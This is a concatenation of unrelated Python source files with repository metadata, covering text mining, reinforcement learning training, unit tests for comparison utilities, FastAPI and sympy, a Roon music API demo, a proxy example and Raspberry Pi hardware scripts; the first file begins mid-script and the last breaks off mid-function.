start_time = time.time()
# try using configargparse for config files
    try:
        import configargparse
        parser = configargparse.ArgumentParser(description='')
        # the config-file option is only supported by configargparse
        parser.add('-c', '--my-config', required=False, is_config_file=True, help='config file path')
    except ImportError:
        import argparse
        parser = argparse.ArgumentParser(description='')
parser.add_argument("--goldstd", default="", dest="goldstd", help="Gold standard to be used.")
parser.add_argument("--corpus", dest="corpus_path", default="corpora/mirna-ds/abstracts.txt",
help="corpus path")
parser.add_argument("--models", dest="models", help="model destination path, without extension")
parser.add_argument("--entitytype", dest="etype", help="type of entities to be considered", default="all")
parser.add_argument("--pairtype", dest="ptype", help="type of pairs to be considered", default="all")
parser.add_argument("--doctype", dest="doctype", help="type of document to be considered", default="all")
parser.add_argument("--pubmedquery", dest="pubmedquery", help="terms parameter of a pubmed query",
default='(("cystic fibrosis"[MeSH Terms] OR ("cystic"[All Fields] AND "fibrosis"[All Fields]) OR "cystic fibrosis"[All Fields])\
AND ("micrornas"[MeSH Terms] OR "micrornas"[All Fields] OR "mirna"[All Fields])) AND ("2011/09/04"[PDat] : "2016/09/01"[PDat])')
parser.add_argument("-o", "--output", "--format", dest="output",
nargs=2, help="format path; output formats: xml, html, tsv, text, chemdner.")
parser.add_argument("--get_pubmed", action='store_true')
parser.add_argument("--parse", action='store_true')
parser.add_argument("--annotate_entities", action='store_true')
parser.add_argument("--normalize_entities", action='store_true')
parser.add_argument("--lexicons", default=["CHEMICAL", "CELL_LINE_AND_CELL_TYPE", "DISEASE", "PROTEIN", "MIRNA",
"SUBCELLULAR_STRUCTURE", "TISSUE_AND_ORGAN"], nargs='+')
parser.add_argument("--log", action="store", dest="loglevel", default="WARNING", help="Log level")
options = parser.parse_args()
# set logger
numeric_level = getattr(logging, options.loglevel.upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: %s' % options.loglevel)
while len(logging.root.handlers) > 0:
logging.root.removeHandler(logging.root.handlers[-1])
logging_format = '%(asctime)s %(levelname)s %(filename)s:%(lineno)s:%(funcName)s %(message)s'
logging.basicConfig(level=numeric_level, format=logging_format)
logging.getLogger().setLevel(numeric_level)
logging.getLogger("requests.packages").setLevel(30)
#negative_pmids = open("negative_pmids.txt", 'r').readlines()
if options.get_pubmed:
get_pubmed_abstracts(options.pubmedquery, options.corpus_path, options.goldstd)
if options.parse:
import spacy
from spacy.symbols import ORTH, LEMMA, POS
nlp = spacy.load('en_core_web_md')
#nlp = spacy.load('en')
print("processing corpus")
process_documents(options.goldstd, nlp)
if options.annotate_entities:
annotate_documents(options.goldstd, options.lexicons)
write_annotations_to_file(options.goldstd)
#print session.query(Document).count()
if options.normalize_entities:
normalize_entities(options.goldstd, options.lexicons)
# annotate
#results = pickle.load(open("results/mirna_ds_entities.pickle", 'rb'))
#results.load_corpus("mirna_ds")
#corpus = results.corpus
#annotate_corpus_relations(corpus, "combined", "corpora/mirna-ds/abstracts.txt_1.pickle")
if __name__ == "__main__":
main()
| 44.997743
| 153
| 0.57565
|
31a5287cf6697005fa43a6beb286cea7276a1800
| 3,184
|
py
|
Python
|
rlkit/core/batch_rl_algorithm.py
|
JieRen98/rlkit-pmoe
|
5ef4e056764d2c4a8d6e4c6da89295304b1fec3f
|
[
"MIT"
] | 3
|
2021-06-15T03:03:52.000Z
|
2021-12-20T03:08:03.000Z
|
rlkit/core/batch_rl_algorithm.py
|
JieRen98/rlkit-pmoe
|
5ef4e056764d2c4a8d6e4c6da89295304b1fec3f
|
[
"MIT"
] | null | null | null |
rlkit/core/batch_rl_algorithm.py
|
JieRen98/rlkit-pmoe
|
5ef4e056764d2c4a8d6e4c6da89295304b1fec3f
|
[
"MIT"
] | null | null | null |
import abc
import gtimer as gt
from rlkit.core.rl_algorithm import BaseRLAlgorithm
from rlkit.data_management.replay_buffer import ReplayBuffer
from rlkit.samplers.data_collector import PathCollector
class BatchRLAlgorithm(BaseRLAlgorithm, metaclass=abc.ABCMeta):
def __init__(
self,
trainer,
exploration_env,
evaluation_env,
exploration_data_collector: PathCollector,
evaluation_data_collector: PathCollector,
replay_buffer: ReplayBuffer,
batch_size,
max_path_length,
num_epochs,
num_eval_steps_per_epoch,
num_expl_steps_per_train_loop,
num_trains_per_train_loop,
num_train_loops_per_epoch=1,
min_num_steps_before_training=0,
):
super().__init__(
trainer,
exploration_env,
evaluation_env,
exploration_data_collector,
evaluation_data_collector,
replay_buffer,
)
self.batch_size = batch_size
self.max_path_length = max_path_length
self.num_epochs = num_epochs
self.num_eval_steps_per_epoch = num_eval_steps_per_epoch
self.num_trains_per_train_loop = num_trains_per_train_loop
self.num_train_loops_per_epoch = num_train_loops_per_epoch
self.num_expl_steps_per_train_loop = num_expl_steps_per_train_loop
self.min_num_steps_before_training = min_num_steps_before_training
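    # Standard batch RL loop: optionally collect warm-up steps, then for every
    # epoch run evaluation rollouts followed by alternating exploration
    # sampling, replay-buffer storage, and gradient updates on sampled batches.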
def _train(self):
if self.min_num_steps_before_training > 0:
init_expl_paths = self.expl_data_collector.collect_new_paths(
self.max_path_length,
self.min_num_steps_before_training,
discard_incomplete_paths=False,
)
self.replay_buffer.add_paths(init_expl_paths)
self.expl_data_collector.end_epoch(-1)
for epoch in gt.timed_for(
range(self._start_epoch, self.num_epochs),
save_itrs=True,
):
self.eval_data_collector.collect_new_paths(
self.max_path_length,
self.num_eval_steps_per_epoch,
discard_incomplete_paths=True,
)
gt.stamp('evaluation sampling')
for _ in range(self.num_train_loops_per_epoch):
new_expl_paths = self.expl_data_collector.collect_new_paths(
self.max_path_length,
self.num_expl_steps_per_train_loop,
discard_incomplete_paths=False,
)
gt.stamp('exploration sampling', unique=False)
self.replay_buffer.add_paths(new_expl_paths)
gt.stamp('data storing', unique=False)
self.training_mode(True)
for _ in range(self.num_trains_per_train_loop):
train_data = self.replay_buffer.random_batch(
self.batch_size)
self.trainer.train(train_data)
gt.stamp('training', unique=False)
self.training_mode(False)
self._end_epoch(epoch)
| 37.023256
| 76
| 0.624372
|
55d13f21e0ae3c167e4da17a45fa2a93c5184dae
| 4,700
|
py
|
Python
|
test/testcases/pyrad/test_lcompare.py
|
Lilith5th/Radiance
|
3aff252e57e6d2ca9205cf7caf20aaa1a897aaf2
|
[
"BSD-3-Clause-LBNL"
] | 154
|
2015-01-27T15:02:36.000Z
|
2022-01-06T18:14:18.000Z
|
test/testcases/pyrad/test_lcompare.py
|
Lilith5th/Radiance
|
3aff252e57e6d2ca9205cf7caf20aaa1a897aaf2
|
[
"BSD-3-Clause-LBNL"
] | 35
|
2015-05-11T21:41:31.000Z
|
2021-12-17T13:23:57.000Z
|
test/testcases/pyrad/test_lcompare.py
|
Lilith5th/Radiance
|
3aff252e57e6d2ca9205cf7caf20aaa1a897aaf2
|
[
"BSD-3-Clause-LBNL"
] | 64
|
2015-01-21T00:52:40.000Z
|
2022-02-07T12:15:09.000Z
|
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
import struct
import operator
import unittest
from functools import reduce
import testsupport as ts
from pyradlib import lcompare
from pyradlib.pyrad_proc import PIPE, Error, ProcMixin
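# Unit tests for pyradlib.lcompare: nested-list comparison with fuzzy numeric
# matching, header splitting, and parsing of Radiance scene descriptions.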
class LcompareTestCase(unittest.TestCase, ProcMixin):
def test_lc_llcompare(self):
# with values higher than 44721, total will return a float in e-format.
for xc, data, exp in (
( None,
( ('abcde', 'fgh', '1234', '56.789'),
('xyz', '432', '987.65432')
),
( ('abcde', 'fgh', 1234, 56.789),
('xyz', 432, 987.65432)
),
),
( None,
( (('a', 'b', 'c'),('d', 'e', 'f')),
(('0', '1', '2', '3'),('1.1', '2.2', '3.000e-03')),
),
( (('a', 'b', 'c'),('d', 'e', 'f')),
(range(4),(1.1, 2.2, 0.003)),
),
),
( lcompare.error, # top level length
(('a', 'b', 'c'),('c','d'),('e','f'),),
(('a', 'b', 'c'),('c','d'),),
),
( lcompare.error, # top level length
(('a', 'b', 'c'),('c','d'),),
(('a', 'b', 'c'),('c','d'),('e','f'),),
),
( lcompare.error, # 2nd level length
(('a', 'b', 'c'),('c','d'),('e','f','g'),),
(('a', 'b', 'c'),('c','d'),('e','f'),),
),
( lcompare.error, # 2nd level length
(('a', 'b', 'c'),('c','d'),('e','f'),),
(('a', 'b', 'c'),('c','d'),('e','f','g'),),
),
( lcompare.error, # string diff
(('a', 'b', 'c'),('c','d'),('e','f','g'),),
(('a', 'b', 'c'),('c','d'),('e','f','h'),),
),
( lcompare.error, # int diff
(('a', 'b', 'c'),('c','d'),('1','2','3'),),
(('a', 'b', 'c'),('c','d'),( 1, 2, 4),),
),
( lcompare.error, # float diff
(('a', 'b', 'c'),('c','d'),('1.1','2.2','3.3'),),
(('a', 'b', 'c'),('c','d'),( 1.1, 2.2, 3.4),),
),
( lcompare.error, # exponent diff
(('a', 'b', 'c'),('c','d'),('1.1','2.2','3.0000e-02'),),
(('a', 'b', 'c'),('c','d'),( 1.1, 2.2, 0.003),),
),
( lcompare.error, # fuzzy compare
(('a', 'b', 'c'),('c','d'),('1.1','2.2','3.00000003'),),
(('a', 'b', 'c'),('c','d'),( 1.1, 2.2, 3.0000003),),
),
( None, # fuzzy compare
(('a', 'b', 'c'),('c','d'),('1.1','2.2','3.000000003'),),
(('a', 'b', 'c'),('c','d'),( 1.1, 2.2, 3.00000003),),
),
):
if xc:
self.assertRaises(xc, lcompare.llcompare, data, exp)
else:
try: lcompare.llcompare(data, exp)
except lcompare.error as e:
self.fail(('call_one_text ') +str(e))
def test_lc_split_headers(self):
htxt = '''example.hdr:
Xim format conversion by:
FORMAT=32-bit_rle_rgbe
pfilt -e 2 -x 512 -y 512 -p 1 -r .67
EXPOSURE=4.926198e+00
normpat
pfilt -1 -e .2
EXPOSURE=2.000000e-01
pfilt -x 128 -y 128
PIXASPECT=0.500000
EXPOSURE=2.571646e+00'''
res = lcompare.split_headers(htxt)
exp = (
('', ('example.hdr:',)),
('\t\t', ('Xim','format','conversion','by:')),
('\t\t', 'FORMAT', '=', ('32-bit_rle_rgbe',)),
('\t\t',
('pfilt','-e','2','-x','512','-y','512','-p','1','-r','.67')),
('\t\t', 'EXPOSURE', '=', ('4.926198e+00',)),
('\t\t', ('normpat',)),
('\t\t', ('pfilt','-1','-e','.2',)),
('\t\t', 'EXPOSURE', '=', ('2.000000e-01',)),
('\t\t', ('pfilt','-x','128','-y','128',)),
('\t\t', 'PIXASPECT', '=', ('0.500000',)),
('\t\t', 'EXPOSURE', '=', ('2.571646e+00',)),
)
try: lcompare.llcompare(res, exp)
except lcompare.error as e:
self.fail(('call_one_text ') +str(e))
def test_lc_split_radfile(self):
df = ts.datafile('window_src.rad')
exp = ([['#'],
['#', 'A', 'plain', 'old', 'glass', 'window'],
['#'],
[], ['void', 'light', 'window_light'],
[0], [0], [3, 1, 1, 1],
[], ['window_light', 'polygon', 'window'],
[0], [0], [12], [23.5, 43, 30], [23.5, 26, 30],
[-23.5, 26, 30], [-23.5, 43, 30], []])
resl = lcompare.split_radfile(df)
try: lcompare.lcompare(resl, exp)
except lcompare.error as e:
print(resl, exp)
            self.fail('split_radfile -- ' + str(e))
def test_lc_split_rad(self):
df = ts.datafile('window_src.rad')
exp = ([['#'],
['#', 'A', 'plain', 'old', 'glass', 'window'],
['#'],
[], ['void', 'light', 'window_light'],
[0], [0], [3, 1, 1, 1],
[], ['window_light', 'polygon', 'window'],
[0], [0], [12], [23.5, 43, 30], [23.5, 26, 30],
[-23.5, 26, 30], [-23.5, 43, 30], []])
with open(df) as f:
res = f.read()
resl = lcompare.split_rad(res)
try: lcompare.lcompare(resl, exp)
except lcompare.error as e:
print(resl, exp)
            self.fail('split_rad -- ' + str(e))
# vi: set ts=4 sw=4 :
| 31.333333
| 73
| 0.450638
|
70c84394ce0fb828ae315bf04dbf7e8a6038aa89
| 316
|
py
|
Python
|
rest_action_permissions/__version__.py
|
apirobot/django-rest-action-permissions
|
79d25a19dc5a8b3b0047d3f5d3ef185cac7ba09b
|
[
"MIT"
] | 8
|
2018-05-30T09:43:05.000Z
|
2021-07-10T12:55:47.000Z
|
rest_action_permissions/__version__.py
|
apirobot/django-rest-action-permissions
|
79d25a19dc5a8b3b0047d3f5d3ef185cac7ba09b
|
[
"MIT"
] | 2
|
2018-05-30T09:43:34.000Z
|
2019-05-28T05:47:35.000Z
|
rest_action_permissions/__version__.py
|
apirobot/django-rest-action-permissions
|
79d25a19dc5a8b3b0047d3f5d3ef185cac7ba09b
|
[
"MIT"
] | 2
|
2019-04-21T12:51:15.000Z
|
2020-04-11T12:16:08.000Z
|
__version__ = '2.0.0'
__title__ = 'django-rest-action-permissions'
__description__ = 'Action based permissions for Django REST Framework.'
__url__ = 'https://github.com/apirobot/django-rest-action-permissions'
__author__ = 'Denis Orehovsky'
__author_email__ = 'denis.orehovsky@gmail.com'
__license__ = 'MIT License'
| 39.5
| 71
| 0.78481
|
cf5fe6b92130053a403b188075dc9566883dd02a
| 702
|
py
|
Python
|
examples/demo.py
|
doctorfree/pyroon
|
0b00a44aa2bfb28fa26c8345bcdf6fb79e497fa3
|
[
"Apache-2.0"
] | 10
|
2018-09-03T14:30:02.000Z
|
2020-03-04T16:53:46.000Z
|
examples/demo.py
|
doctorfree/pyroon
|
0b00a44aa2bfb28fa26c8345bcdf6fb79e497fa3
|
[
"Apache-2.0"
] | 2
|
2019-02-19T20:17:35.000Z
|
2019-03-10T18:56:53.000Z
|
examples/demo.py
|
doctorfree/pyroon
|
0b00a44aa2bfb28fa26c8345bcdf6fb79e497fa3
|
[
"Apache-2.0"
] | 5
|
2019-03-03T11:54:37.000Z
|
2020-07-04T15:11:25.000Z
|
from roonapi import RoonApi, RoonDiscovery
appinfo = {
"extension_id": "python_roon_test",
"display_name": "Python library for Roon",
"display_version": "1.0.0",
"publisher": "gregd",
"email": "mygreat@emailaddress.com",
}
# Can be None if you don't yet have a token
try:
core_id = open("my_core_id_file").read()
token = open("my_token_file").read()
except OSError:
print("Please authorise first using discovery.py")
exit()
discover = RoonDiscovery(core_id)
server = discover.first()
discover.stop()
roonapi = RoonApi(appinfo, token, server[0], server[1], True)
# get all zones (as dict)
print(roonapi.zones)
# get all outputs (as dict)
print(roonapi.outputs)
| 23.4
| 61
| 0.692308
|
0b480abbd0929859dbfc8bd712ac67f8f4643abf
| 642
|
py
|
Python
|
python/crawler/hello_urllib2_proxyhandler.py
|
fendoudebb/learnin
|
e9bdfcaa028b6a41fd7bebfbbc2037f50f2112e1
|
[
"Apache-2.0"
] | 1
|
2021-03-30T06:02:07.000Z
|
2021-03-30T06:02:07.000Z
|
python/crawler/hello_urllib2_proxyhandler.py
|
fendoudebb/learnin
|
e9bdfcaa028b6a41fd7bebfbbc2037f50f2112e1
|
[
"Apache-2.0"
] | 4
|
2021-03-08T12:58:36.000Z
|
2021-11-16T05:43:20.000Z
|
python/crawler/hello_urllib2_proxyhandler.py
|
fendoudebb/learnin
|
e9bdfcaa028b6a41fd7bebfbbc2037f50f2112e1
|
[
"Apache-2.0"
] | 2
|
2021-04-22T02:39:11.000Z
|
2021-07-30T01:44:04.000Z
|
# -*- coding:utf-8 -*-
from http.client import HTTPResponse
from urllib import request
# Build a ProxyHandler that routes HTTP requests through the given proxy
proxy_handler = request.ProxyHandler({'http': '127.0.0.1:8080'})
opener = request.build_opener(proxy_handler)
# Install the opener globally so that all subsequent requests can use urlopen(); otherwise opener.open() must be called explicitly, or the proxy is bypassed
request.install_opener(opener)
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
}
r = request.Request('http://www.baidu.com', headers=headers)
# response = opener.open(r)
response = request.urlopen(r) # type: HTTPResponse
print(response.read().decode('gbk'))
| 25.68
| 120
| 0.721184
|
467ed9f4fb6c1f9497d230e555279b11edb159a6
| 3,449
|
py
|
Python
|
tests/test_multi_query_errors.py
|
jfunez/fastapi
|
7372f6ba11abb515a7f11814dba52a1d1c0925f0
|
[
"MIT"
] | 2
|
2020-04-09T07:11:28.000Z
|
2020-12-12T14:04:35.000Z
|
tests/test_multi_query_errors.py
|
jfunez/fastapi
|
7372f6ba11abb515a7f11814dba52a1d1c0925f0
|
[
"MIT"
] | 1
|
2021-03-27T18:37:32.000Z
|
2021-05-25T15:08:24.000Z
|
tests/test_multi_query_errors.py
|
jfunez/fastapi
|
7372f6ba11abb515a7f11814dba52a1d1c0925f0
|
[
"MIT"
] | 1
|
2021-02-03T00:43:04.000Z
|
2021-02-03T00:43:04.000Z
|
from typing import List
from fastapi import FastAPI, Query
from fastapi.testclient import TestClient
app = FastAPI()
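# Minimal app under test: a List[int] query parameter that should accept
# repeated ?q= values and report one validation error per non-integer item.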
@app.get("/items/")
def read_items(q: List[int] = Query(None)):
return {"q": q}
client = TestClient(app)
openapi_schema = {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/items/": {
"get": {
"responses": {
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"summary": "Read Items",
"operationId": "read_items_items__get",
"parameters": [
{
"required": False,
"schema": {
"title": "Q",
"type": "array",
"items": {"type": "integer"},
},
"name": "q",
"in": "query",
}
],
}
}
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {"type": "string"},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
multiple_errors = {
"detail": [
{
"loc": ["query", "q", 0],
"msg": "value is not a valid integer",
"type": "type_error.integer",
},
{
"loc": ["query", "q", 1],
"msg": "value is not a valid integer",
"type": "type_error.integer",
},
]
}
def test_openapi_schema():
response = client.get("/openapi.json")
assert response.status_code == 200
assert response.json() == openapi_schema
def test_multi_query():
response = client.get("/items/?q=5&q=6")
assert response.status_code == 200
assert response.json() == {"q": [5, 6]}
def test_multi_query_incorrect():
response = client.get("/items/?q=five&q=six")
assert response.status_code == 422
assert response.json() == multiple_errors
| 28.983193
| 86
| 0.372282
|
633f5c84cf41bc3d9e488b416f173abe3a17c0ab
| 1,932
|
py
|
Python
|
read_pot.py
|
94KeyboardsSmashed/MWR_PlasmaPot
|
8ed21c9ea324b5107ac67a5272c044ce08bd81a5
|
[
"MIT"
] | null | null | null |
read_pot.py
|
94KeyboardsSmashed/MWR_PlasmaPot
|
8ed21c9ea324b5107ac67a5272c044ce08bd81a5
|
[
"MIT"
] | null | null | null |
read_pot.py
|
94KeyboardsSmashed/MWR_PlasmaPot
|
8ed21c9ea324b5107ac67a5272c044ce08bd81a5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import serial
from sys import stdout
import time
import threading
import raspi_neopixel_lib
import Adafruit_CharLCD as LCD
# Raspberry Pi pin configuration:
lcd_rs = 26
lcd_en = 19
lcd_d4 = 13
lcd_d5 = 6
lcd_d6 = 5
lcd_d7 = 11
lcd_backlight = 9
#Neopixel Config
LED_COUNT_1 = 24
LED_PIN_1 = 18
LED_FREQ_HZ_1 = 800000
LED_DMA_1 = 5
LED_BRIGHTNESS_1 = 255
LED_INVERT_1 = False
# Define LCD column and row size for 16x2 LCD.
lcd_columns = 16
lcd_rows = 2
timer = 0
# Initialize the LCD using the pins above.
lcd = LCD.Adafruit_CharLCD(lcd_rs, lcd_en, lcd_d4, lcd_d5, lcd_d6, lcd_d7,
lcd_columns, lcd_rows, lcd_backlight)
# Print a two line message
lcd.set_backlight(0)
lcd.message('Starting')
ser = serial.Serial('/dev/ttyACM0',9600)
s = []
CORSICA = raspi_neopixel_lib.Adafruit_NeoPixel(LED_COUNT_1, LED_PIN_1, LED_FREQ_HZ_1,
LED_DMA_1, LED_INVERT_1, LED_BRIGHTNESS_1)
CORSICA.begin()
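# Main loop: keep a rolling window of the most recent serial readings, average
# them, map the average to a 0 to 58 display scale and to kilovolts, and
# periodically refresh the LCD and the NeoPixel ring.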
while True:
read_serial=ser.readline()
stripped = read_serial.rstrip()
s.append(stripped)
if len(s) >= 20:
s.pop(0)
    # drop any non-numeric serial reads before averaging
    s = [val for val in s if val.isdigit()]
v = list(map(int, s))
average = int(sum(v)/len(v))
image = ((58.0/1023.0)*float(average))
rounded = "%.0f" %image
print (rounded)
kilovolts = ((10.0/1023.0)*float(average)) #(19.0/3410.0)*x+4.3 for 4.3-10.0
if timer == 50:
timer = 0
lcd.clear()
lcd.message('Voltage\n%.1f KV' %kilovolts)
elif timer % 7 == 0:
CORSICA.neopixel_percentage(float(rounded)/58)
stdout.flush()
timer += 1
| 28
| 95
| 0.556936
|
4752fa7796305a4518e93f16878f63f4aa63dda7
| 44,985
|
py
|
Python
|
sympy/utilities/tests/test_lambdify.py
|
bigfooted/sympy
|
1fb2490fa2fa9b476da450f02a25b03c1dc07cf0
|
[
"BSD-3-Clause"
] | 2
|
2021-08-25T13:51:41.000Z
|
2022-01-06T07:12:47.000Z
|
sympy/utilities/tests/test_lambdify.py
|
bigfooted/sympy
|
1fb2490fa2fa9b476da450f02a25b03c1dc07cf0
|
[
"BSD-3-Clause"
] | 2
|
2021-06-02T17:18:28.000Z
|
2021-06-02T17:38:57.000Z
|
sympy/utilities/tests/test_lambdify.py
|
bigfooted/sympy
|
1fb2490fa2fa9b476da450f02a25b03c1dc07cf0
|
[
"BSD-3-Clause"
] | 1
|
2021-02-20T14:12:19.000Z
|
2021-02-20T14:12:19.000Z
|
from itertools import product
import math
import inspect
import mpmath
from sympy.testing.pytest import raises
from sympy import (
symbols, lambdify, sqrt, sin, cos, tan, pi, acos, acosh, Rational,
Float, Lambda, Piecewise, exp, E, Integral, oo, I, Abs, Function,
true, false, And, Or, Not, ITE, Min, Max, floor, diff, IndexedBase, Sum,
DotProduct, Eq, Dummy, sinc, erf, erfc, factorial, gamma, loggamma,
digamma, RisingFactorial, besselj, bessely, besseli, besselk, S, beta,
betainc, betainc_regularized, fresnelc, fresnels)
from sympy.codegen.cfunctions import expm1, log1p, exp2, log2, log10, hypot
from sympy.codegen.numpy_nodes import logaddexp, logaddexp2
from sympy.codegen.scipy_nodes import cosm1
from sympy.functions.elementary.complexes import re, im, arg
from sympy.functions.special.polynomials import \
chebyshevt, chebyshevu, legendre, hermite, laguerre, gegenbauer, \
assoc_legendre, assoc_laguerre, jacobi
from sympy.matrices import Matrix, MatrixSymbol, SparseMatrix
from sympy.printing.lambdarepr import LambdaPrinter
from sympy.printing.numpy import NumPyPrinter
from sympy.utilities.lambdify import implemented_function, lambdastr
from sympy.testing.pytest import skip
from sympy.utilities.decorator import conserve_mpmath_dps
from sympy.external import import_module
from sympy.functions.special.gamma_functions import uppergamma, lowergamma
import sympy
MutableDenseMatrix = Matrix
numpy = import_module('numpy')
scipy = import_module('scipy', import_kwargs={'fromlist': ['sparse']})
numexpr = import_module('numexpr')
tensorflow = import_module('tensorflow')
cupy = import_module('cupy')
if tensorflow:
# Hide Tensorflow warnings
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
w, x, y, z = symbols('w,x,y,z')
#================== Test different arguments =======================
def test_no_args():
f = lambdify([], 1)
raises(TypeError, lambda: f(-1))
assert f() == 1
def test_single_arg():
f = lambdify(x, 2*x)
assert f(1) == 2
def test_list_args():
f = lambdify([x, y], x + y)
assert f(1, 2) == 3
def test_nested_args():
f1 = lambdify([[w, x]], [w, x])
assert f1([91, 2]) == [91, 2]
raises(TypeError, lambda: f1(1, 2))
f2 = lambdify([(w, x), (y, z)], [w, x, y, z])
assert f2((18, 12), (73, 4)) == [18, 12, 73, 4]
raises(TypeError, lambda: f2(3, 4))
f3 = lambdify([w, [[[x]], y], z], [w, x, y, z])
assert f3(10, [[[52]], 31], 44) == [10, 52, 31, 44]
def test_str_args():
f = lambdify('x,y,z', 'z,y,x')
assert f(3, 2, 1) == (1, 2, 3)
assert f(1.0, 2.0, 3.0) == (3.0, 2.0, 1.0)
# make sure correct number of args required
raises(TypeError, lambda: f(0))
def test_own_namespace_1():
myfunc = lambda x: 1
f = lambdify(x, sin(x), {"sin": myfunc})
assert f(0.1) == 1
assert f(100) == 1
def test_own_namespace_2():
def myfunc(x):
return 1
f = lambdify(x, sin(x), {'sin': myfunc})
assert f(0.1) == 1
assert f(100) == 1
def test_own_module():
f = lambdify(x, sin(x), math)
assert f(0) == 0.0
def test_bad_args():
# no vargs given
raises(TypeError, lambda: lambdify(1))
# same with vector exprs
raises(TypeError, lambda: lambdify([1, 2]))
def test_atoms():
# Non-Symbol atoms should not be pulled out from the expression namespace
f = lambdify(x, pi + x, {"pi": 3.14})
assert f(0) == 3.14
f = lambdify(x, I + x, {"I": 1j})
assert f(1) == 1 + 1j
#================== Test different modules =========================
# a high-precision value of sin(0.2) is used to detect unwanted loss of precision
@conserve_mpmath_dps
def test_sympy_lambda():
mpmath.mp.dps = 50
sin02 = mpmath.mpf("0.19866933079506121545941262711838975037020672954020")
f = lambdify(x, sin(x), "sympy")
assert f(x) == sin(x)
prec = 1e-15
assert -prec < f(Rational(1, 5)).evalf() - Float(str(sin02)) < prec
# arctan is in numpy module and should not be available
# The arctan below gives NameError. What is this supposed to test?
# raises(NameError, lambda: lambdify(x, arctan(x), "sympy"))
@conserve_mpmath_dps
def test_math_lambda():
mpmath.mp.dps = 50
sin02 = mpmath.mpf("0.19866933079506121545941262711838975037020672954020")
f = lambdify(x, sin(x), "math")
prec = 1e-15
assert -prec < f(0.2) - sin02 < prec
raises(TypeError, lambda: f(x))
# if this succeeds, it can't be a python math function
@conserve_mpmath_dps
def test_mpmath_lambda():
mpmath.mp.dps = 50
sin02 = mpmath.mpf("0.19866933079506121545941262711838975037020672954020")
f = lambdify(x, sin(x), "mpmath")
prec = 1e-49 # mpmath precision is around 50 decimal places
assert -prec < f(mpmath.mpf("0.2")) - sin02 < prec
raises(TypeError, lambda: f(x))
# if this succeeds, it can't be a mpmath function
@conserve_mpmath_dps
def test_number_precision():
mpmath.mp.dps = 50
sin02 = mpmath.mpf("0.19866933079506121545941262711838975037020672954020")
f = lambdify(x, sin02, "mpmath")
prec = 1e-49 # mpmath precision is around 50 decimal places
assert -prec < f(0) - sin02 < prec
@conserve_mpmath_dps
def test_mpmath_precision():
mpmath.mp.dps = 100
assert str(lambdify((), pi.evalf(100), 'mpmath')()) == str(pi.evalf(100))
#================== Test Translations ==============================
# We can only check if all translated functions are valid. It has to be checked
# by hand if they are complete.
def test_math_transl():
from sympy.utilities.lambdify import MATH_TRANSLATIONS
for sym, mat in MATH_TRANSLATIONS.items():
assert sym in sympy.__dict__
assert mat in math.__dict__
def test_mpmath_transl():
from sympy.utilities.lambdify import MPMATH_TRANSLATIONS
for sym, mat in MPMATH_TRANSLATIONS.items():
assert sym in sympy.__dict__ or sym == 'Matrix'
assert mat in mpmath.__dict__
def test_numpy_transl():
if not numpy:
skip("numpy not installed.")
from sympy.utilities.lambdify import NUMPY_TRANSLATIONS
for sym, nump in NUMPY_TRANSLATIONS.items():
assert sym in sympy.__dict__
assert nump in numpy.__dict__
def test_scipy_transl():
if not scipy:
skip("scipy not installed.")
from sympy.utilities.lambdify import SCIPY_TRANSLATIONS
for sym, scip in SCIPY_TRANSLATIONS.items():
assert sym in sympy.__dict__
assert scip in scipy.__dict__ or scip in scipy.special.__dict__
def test_numpy_translation_abs():
if not numpy:
skip("numpy not installed.")
f = lambdify(x, Abs(x), "numpy")
assert f(-1) == 1
assert f(1) == 1
def test_numexpr_printer():
if not numexpr:
skip("numexpr not installed.")
# if translation/printing is done incorrectly then evaluating
# a lambdified numexpr expression will throw an exception
from sympy.printing.lambdarepr import NumExprPrinter
blacklist = ('where', 'complex', 'contains')
arg_tuple = (x, y, z) # some functions take more than one argument
for sym in NumExprPrinter._numexpr_functions.keys():
if sym in blacklist:
continue
ssym = S(sym)
if hasattr(ssym, '_nargs'):
nargs = ssym._nargs[0]
else:
nargs = 1
args = arg_tuple[:nargs]
f = lambdify(args, ssym(*args), modules='numexpr')
assert f(*(1, )*nargs) is not None
def test_issue_9334():
if not numexpr:
skip("numexpr not installed.")
if not numpy:
skip("numpy not installed.")
expr = S('b*a - sqrt(a**2)')
a, b = sorted(expr.free_symbols, key=lambda s: s.name)
func_numexpr = lambdify((a,b), expr, modules=[numexpr], dummify=False)
foo, bar = numpy.random.random((2, 4))
func_numexpr(foo, bar)
def test_issue_12984():
import warnings
if not numexpr:
skip("numexpr not installed.")
func_numexpr = lambdify((x,y,z), Piecewise((y, x >= 0), (z, x > -1)), numexpr)
assert func_numexpr(1, 24, 42) == 24
with warnings.catch_warnings():
warnings.simplefilter("ignore", RuntimeWarning)
assert str(func_numexpr(-1, 24, 42)) == 'nan'
#================== Test some functions ============================
def test_exponentiation():
f = lambdify(x, x**2)
assert f(-1) == 1
assert f(0) == 0
assert f(1) == 1
assert f(-2) == 4
assert f(2) == 4
assert f(2.5) == 6.25
def test_sqrt():
f = lambdify(x, sqrt(x))
assert f(0) == 0.0
assert f(1) == 1.0
assert f(4) == 2.0
assert abs(f(2) - 1.414) < 0.001
assert f(6.25) == 2.5
def test_trig():
f = lambdify([x], [cos(x), sin(x)], 'math')
d = f(pi)
prec = 1e-11
assert -prec < d[0] + 1 < prec
assert -prec < d[1] < prec
d = f(3.14159)
prec = 1e-5
assert -prec < d[0] + 1 < prec
assert -prec < d[1] < prec
def test_integral():
f = Lambda(x, exp(-x**2))
